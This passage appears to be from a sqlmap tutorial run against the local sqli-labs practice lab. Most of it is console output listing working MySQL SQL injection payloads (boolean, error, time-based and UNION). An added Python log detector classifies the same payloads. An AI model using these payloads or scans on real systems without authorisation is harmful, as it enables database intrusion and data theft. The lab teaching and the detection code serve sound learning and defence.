[19:46:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:46:31] [INFO] target URL appears to have 3 columns in query
[19:46:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3986=3986 AND 'enRu'='enRu

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716a6b7871,(SELECT (ELT(1856=1856,1))),0x7176627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lead'='lead

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1215 FROM (SELECT(SLEEP(5)))pAXX) AND 'hFkU'='hFkU

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7916' UNION ALL SELECT NULL,CONCAT(0x716a6b7871,0x5555746d5964564d754675746c4543626c4f556c4f79716874665470654872514878594c714b4b42,0x7176627171),NULL-- -
---
[19:46:36] [INFO] the back-end DBMS is MySQL
[19:46:36] [INFO] fetching banner
[19:46:37] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:46:37] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 19:46:37 /2020-02-29/
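The four payload families in the injection-point summary above (boolean-based, error-based, time-based, UNION) and the sqlmap User-Agent from the TRAFFIC OUT request are exactly what these probes leave behind in the web server's access log. As an added example, not part of the original article or of sqlmap, the following Python detector parses constructed Apache combined-log lines built from the payloads shown above, URL-decodes the query string and classifies each request by technique; the client IPs, timestamps and byte counts are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines modelled on the requests the sqlmap runs
# above send to /sqli-labs/Less-1/. The payload strings and the User-Agent are
# taken from the output shown on the page; client IPs, timestamps and byte
# counts are made up. Apache logs the request line as received, so the payloads
# appear URL-encoded.
SAMPLE_LOG = r"""
127.0.0.1 - - [29/Feb/2020:18:34:00 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 812 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [29/Feb/2020:19:46:20 +0000] "GET /sqli-labs/Less-1/?id=1%27%20AND%203986%3D3986%20AND%20%27enRu%27%3D%27enRu HTTP/1.1" 200 812 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [29/Feb/2020:19:46:20 +0000] "GET /sqli-labs/Less-1/?id=1%27%20AND%20(SELECT%201856%20FROM(SELECT%20COUNT(*)%2CCONCAT(0x716a6b7871%2C(SELECT%20(ELT(1856%3D1856%2C1)))%2C0x7176627171%2CFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27lead%27%3D%27lead HTTP/1.1" 200 1024 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [29/Feb/2020:19:46:31 +0000] "GET /sqli-labs/Less-1/?id=1%27%20AND%20(SELECT%201215%20FROM%20(SELECT(SLEEP(5)))pAXX)%20AND%20%27hFkU%27%3D%27hFkU HTTP/1.1" 200 812 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
127.0.0.1 - - [29/Feb/2020:19:46:36 +0000] "GET /sqli-labs/Less-1/?id=-7916%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT(0x716a6b7871%2C0x5555746d5964564d754675746c4543626c4f556c4f79716874665470654872514878594c714b4b42%2C0x7176627171)%2CNULL--%20- HTTP/1.1" 200 850 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
10.0.0.7 - - [29/Feb/2020:19:50:00 +0000] "GET /sqli-labs/Less-1/?id=2 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One signature per technique family listed in the injection-point summaries
# above. The boolean-based tautology pattern is the most generic of the four,
# so it is checked last.
TECHNIQUES = [
    ("union-query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("boolean-based", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I)),
]


def classify(query):
    """Return the technique family a decoded query string matches, or None."""
    for name, pattern in TECHNIQUES:
        if pattern.search(query):
            return name
    return None


def parse_line(line):
    """Parse one combined-log line; return a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query)  # decode %27, %20, %3D ... before matching
    rec["sqlmap_ua"] = rec["ua"].lower().startswith("sqlmap/")
    rec["technique"] = classify(rec["query"])
    return rec


def scan(log_text):
    """Return every record that carries an injection payload or a sqlmap User-Agent."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec and (rec["technique"] or rec["sqlmap_ua"]):
            findings.append(rec)
    return findings


def summarize(findings):
    """Count findings per (client IP, technique); a User-Agent-only hit counts as 'ua-only'."""
    counts = {}
    for rec in findings:
        key = (rec["ip"], rec["technique"] or "ua-only")
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(f"{rec['ts']}  {rec['ip']:<10} {rec['technique'] or 'ua-only':<14} {rec['query'][:70]}")
    print(summarize(scan(SAMPLE_LOG)))
```

The User-Agent check only catches a default sqlmap run; the payload signatures still fire when the client string is changed, which is why both are kept.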

                                                                                                                                         

Add parameters and test again (note that the URL is not quoted, so the shell treats each '&' as a command separator: only '?id=1' reaches sqlmap, and the "'us' is not recognized" and "uname: unknown option -- banner" messages at the end of the output come from the shell trying to run 'us=1' and 'uname=admin --banner' as separate commands; quoting the URL avoids this):

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1&us=1&uname=admin -p "id,uname" --banner

Output:

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:07:41 /2020-02-29/

[20:07:42] [INFO] testing connection to the target URL
[20:07:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:07:42] [INFO] testing if the target URL content is stable
[20:07:42] [INFO] target URL content is stable
[20:07:42] [INFO] testing if GET parameter 'id' is dynamic
[20:07:42] [INFO] GET parameter 'id' appears to be dynamic
[20:07:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:07:42] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:07:42] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:07:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:07:45] [WARNING] reflective value(s) found and filtering out
[20:07:45] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:07:45] [INFO] testing 'Generic inline queries'
[20:07:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:07:45] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:07:45] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:07:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:07:45] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:07:45] [INFO] testing 'MySQL inline queries'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:07:45] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:07:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:07:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:07:55] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:07:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:07:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:07:55] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:07:55] [INFO] target URL appears to have 3 columns in query
[20:07:56] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 2973=2973 AND 'kWQV'='kWQV

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4270 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(4270=4270,1))),0x716a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rvTB'='rvTB

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9758 FROM (SELECT(SLEEP(5)))Vtem) AND 'vzvR'='vzvR

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-4491' UNION ALL SELECT NULL,NULL,CONCAT(0x716a766271,0x7353566b685a767a4a68677574726d7662637477586e445172546473554f5872507a616670787677,0x716a6a6b71)-- -
---
[20:08:00] [INFO] the back-end DBMS is MySQL
[20:08:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:08:00] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 20:08:00 /2020-02-29/

'us'Это не внутренняя или внешняя команда, ни исполняемая программа
 Или командный файл.
uname: unknown option -- banner
Try 'uname --help' for more information.
                                                                                                                                 

Skip parameter test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p "id,uname" --flush-session --banner

Output:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:14:15 /2020-02-29/

[20:14:16] [INFO] testing connection to the target URL
[20:14:16] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:14:16] [INFO] testing if the target URL content is stable
[20:14:16] [INFO] target URL content is stable
[20:14:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:14:17] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:14:17] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:14:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:14:21] [WARNING] reflective value(s) found and filtering out
[20:14:21] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:14:21] [INFO] testing 'Generic inline queries'
[20:14:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:14:21] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:14:21] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:14:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:14:21] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:14:21] [INFO] testing 'MySQL inline queries'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:14:21] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:14:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:14:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:14:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:14:32] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:14:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:14:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:14:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:14:32] [INFO] target URL appears to have 3 columns in query
[20:14:32] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7433=7433 AND 'hrGB'='hrGB

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8471 FROM(SELECT COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8471=8471,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ygzr'='Ygzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6957 FROM (SELECT(SLEEP(5)))YTQj) AND 'ogBe'='ogBe

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5025' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7171,0x586f6f6965736173736f49534a4243526a6c4c625a59534d484c6d74426d6d414b7551676b734c56,0x716a766271)-- -
---
[20:14:36] [INFO] the back-end DBMS is MySQL
[20:14:36] [INFO] fetching banner
[20:14:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:14:36] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 20:14:36 /2020-02-29/

                                                                                                        

2. Specifying the URI injection location in sqlmap

When the injection point lies inside the URI itself, some special handling is needed. Unless you mark the URI path by hand, sqlmap does not test the URI path automatically, so you have to mark these injection points in the command line with an asterisk (*).
To test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1*&us=1&uname=admin --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:31:12 /2020-02-29/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[20:31:14] [INFO] testing connection to the target URL
[20:31:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:31:14] [INFO] testing if the target URL content is stable
[20:31:15] [INFO] target URL content is stable
[20:31:15] [INFO] testing if URI parameter '#1*' is dynamic
[20:31:15] [INFO] URI parameter '#1*' appears to be dynamic
[20:31:15] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:31:15] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:31:15] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:31:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:31:17] [WARNING] reflective value(s) found and filtering out
[20:31:17] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:31:17] [INFO] testing 'Generic inline queries'
[20:31:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:31:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:31:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:31:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:17] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:31:17] [INFO] testing 'MySQL inline queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:31:17] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:31:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:31:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:31:27] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:31:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:31:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:31:27] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:31:27] [INFO] target URL appears to have 3 columns in query
[20:31:28] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 9722=9722 AND 'aMLa'='aMLa

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 4986 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(4986=4986,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ocPA'='ocPA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))FboN) AND 'hyuA'='hyuA

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=-5390' UNION ALL SELECT NULL,CONCAT(0x716b787171,0x43554e745571626a51707163415541545a6246417749666442464676727449686b734f566966626b,0x7171767a71),NULL-- -
---
[20:31:33] [INFO] the back-end DBMS is MySQL
[20:31:34] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:31:34] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 20:31:34 /2020-02-29/


Add the * marker to the parameters and retest:

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1*&us=1*&uname=admin" --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:33:23 /2020-02-29/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[20:33:26] [INFO] testing connection to the target URL
[20:33:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:33:26] [INFO] testing if the target URL content is stable
[20:33:26] [INFO] target URL content is stable
[20:33:26] [INFO] testing if URI parameter '#1*' is dynamic
[20:33:26] [INFO] URI parameter '#1*' appears to be dynamic
[20:33:26] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:33:26] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:33:26] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:33:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:33:28] [WARNING] reflective value(s) found and filtering out
[20:33:28] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:33:28] [INFO] testing 'Generic inline queries'
[20:33:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:33:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:28] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:33:28] [INFO] testing 'MySQL inline queries'
[20:33:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:33:28] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:33:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:33:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:33:39] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:33:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:33:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:33:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:33:39] [INFO] target URL appears to have 3 columns in query
[20:33:39] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 6632=6632 AND 'YYeb'='YYeb

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 4244 FROM(SELECT COUNT(*),CONCAT(0x7176786271,(SELECT (ELT(4244=4244,1))),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mGsy'='mGsy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 1332 FROM (SELECT(SLEEP(5)))sgvg) AND 'BhGb'='BhGb

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=-9618' UNION ALL SELECT NULL,NULL,CONCAT(0x7176786271,0x586f6d53686f797063544e70586866436d4b68544670504a415a674f675176744174494f7364754e,0x7178786271)-- -
---
[20:33:55] [INFO] the back-end DBMS is MySQL
[20:33:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:33:56] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 20:33:56 /2020-02-29/


By default, parameters inside the URI are not tested; once marked with *, they are.
Add a cookie and retest:

